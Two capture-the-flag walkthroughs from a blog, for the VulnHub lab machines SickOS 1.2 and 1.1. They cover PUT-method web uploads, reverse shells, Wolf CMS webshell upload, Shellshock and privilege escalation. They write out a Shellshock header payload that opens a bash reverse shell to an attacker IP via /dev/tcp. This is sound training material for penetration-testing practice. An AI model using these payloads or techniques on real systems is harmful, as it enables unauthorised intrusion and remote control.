AdSense

Monday, June 11, 2018

SickOS 1.2


SICKOS 1.2


- Layout for this exercise:





1 - INTRODUCTION


- The goal of this exercise is the study of the hacking process for the vulnerable machine SickOS 1.2:




- SickOS 1.2 can be downloaded from here:

https://www.vulnhub.com/entry/sickos-12,144/


- Once downloaded and extracted with WMware:





2 - ENUMERATION

- Using netdiscover let's notice that the only IP address in the local network working with WMware is 192.168.1.16, so it should correspond to the vulnerable machine SickOS 1.2:






- Scanning with Nmap:




- Connecting to the web service:




- Viewing the source there is nothing interesting:





- Scanning the web content with dirb:





- Going to the /test folder:





- curl shows that the PUT method is allowed, meaning that we can create a resource at the web folder /test:






3 - EXPLOITATION

- Using the -X option and the method PUT let's try to create a simple text file and upload it to the the web folder /test:











- Once we see that the upload is successful let's try some more tricky uploads, for instance creating a cmd.php file useful to execute php scripts:




- Listing with ls -la:





- Opening /etc/passwd with cat:




- Using which let's discover whether netcat is available at the victim machine:





3.1 - Exploiting with curl and netcat

- Taking advantage of this Python reverse shell, and encoding it with the percent-encoding:

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

https://en.wikipedia.org/wiki/Percent-encoding




- Setting a listening session on port 443:




- Running the reverse shell with curl:




- A limited shell is achieved:





3.2 - Exploiting with Command Injection 

- Another alternative would be injecting directly the Pyhon script via the browser. 

- First, setting a listening session on port 443:




- Passing the Python script directly via the browser:




- The limited shell is again achieved:





3.3 - Exploiting with Metasploit

- Setting a Metasploit handler session on port 443:






- Executing the reverse shell script via curl:




- A limited shell is achieved:




- Now, before starting the Privilege Escalation process let's background this Metasploit session for later use:





4 - PRIVILEGE ESCALATION

- Following these directions for Privilege Escalation at a Linux machine:

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/


- Searching for cron.daily:






- cron.daily uses an outdated version of chkrootkit:







- Looking for related vulnerabilities:









- Searching with Metasploit we find an exploit: 






- Setting options for the exploit:




- One of the require options is a session, what corresponds to the session 1 backgrounded at point 3.2 of this exercise:




- Running the exploit, the Privilege Escalation is successful because a root shell is achieved:






5 - CAPTURING THE FLAG

- Going to the /root folder:










Saturday, June 9, 2018

SickOS 1.1


SICKOS 1.1

- Layout for this exercise:




1 - INTRODUCTION

- The goal of this exercise is the study of the hacking process for the vulnerable machine SickOS 1.1

- SickOS 1.1 can be downloaded from here:

https://www.vulnhub.com/entry/sickos-11,132/



- Once downloaded and extracted with WMware:




2 - ENUMERATION

- Using netdiscover let's notice that the only IP address in the local network working with WMware is 192.168.1.15, so it should correspond to the vulnerable machine SickOS 1.1:






- Scanning with Nmap there are 2 ports open: 22 (ssh) and 3128 (Squid http-proxy):




- Configuring the Firefox Connection Settings for the discovered HTTP proxy (192.168.1.15:3128)





- Connecting with the browser:




- Viewing the source there is nothing interesting:




- Let's explore the website structure with dirb:




- Looking at the robots.txt file:




- Exploring the folder /wolfcms:





- Using dirb against wolfcms:




- Looking inside the public folder:





- Using nikto to discover potential vulnerabilities:





- The most remarkable result is that /cgi-bin/status is vulnerable to shellshock vulnerability:





3 - EXPLOITATION

- Let's try two ways to exploit the vulnerable machine.

3.1 - Uploading a webshell

- Googling for Wolf CMS vulnerabilities:









- Going back to /wolfcms we learn that there is an Administrator:



- Reading from the previous description of the vulnerability:




- Let's explore the admin option:





- Trying admin:admin the authentication works:







- Going to the Files tab there is an Upload File function:







- Up to this point, why not to upload a webshell?

- Kali Linux has got some webshells available:




- For instance, let's explore php-reverse-shell.php

- Opening the file we see that there are two parameters that must be changed or adapted to our neeeds (IP and port to connect):







- Copying the webshell to a working folder so that we can manipulate it without losing the original version:






- Opening the webshell and modifying IP and port:







- Now it is ready to be uploaded to the vulnerable machine:
















- We find php-reverse-shell.php at the /public folder:




- Before running it, let's establish a netcat listening session on port 3333:







- Running the webshell:



- The attack is successful, and a limited shell is achieved at the attacker's side:





3.2 - Shellshock

- Now, let's try to exploit the site taking advantage of the shellshock vulnerability

https://metalkey.github.io/shellshock-explained--exploitation-tutorial.html
https://blog.cloudflare.com/inside-shellshock/

- We can check that the cgi script uses bash as interpreter because the path gives us uptime/uname result inside a Json string:




- Setting up a netcat listening session on port 4444:




- Let's craft a command curl to achieve a reverse shell:

https://curl.haxx.se/docs/manpage.html

https://www.surevine.com/shellshocked-a-quick-demo-of-how-easy-it-is-to-exploit/


- The parameters used in this case:
  • - x (proxy) = 192.168.1.15:3128
  • -H (header) = User-Agent ignored; /bin/bash -i>& /dev/tcp/192.168.1.17/4444 0>&1 
  • target = http://192.168.1.15/cgi-bin/status





- A limited shell is achieved at the attacker's side:





4 - PRIVILEGE ESCALATION

- Listing the folder /var/www:




- Listing wolfcms:

















- Opening config.php we find interesting credentials for the user root:




- Trying to use the root credentials to achieve a shell, we find that the current shell does not allow to use the sudo command:




- Importing a tty terminal so that we can run a /bin/bash shell:






- Trying again, su works but the authentication fails:





- Remembering the current user:




- Let's move to another user, for instance sickos:




- Now the authentication is correct:




- Finally a root shell is achieved:




- Also, we could reach to same point by SSH-ing with the sickos user account:







- Surprisingly, sickos is a complete sudoer:








- Also:





5 - CAPTURING THE FLAG

- Reading the flag:




- By the way, the flag's name is an MD5 encryption string:





- Decrypting it results to be bleh!!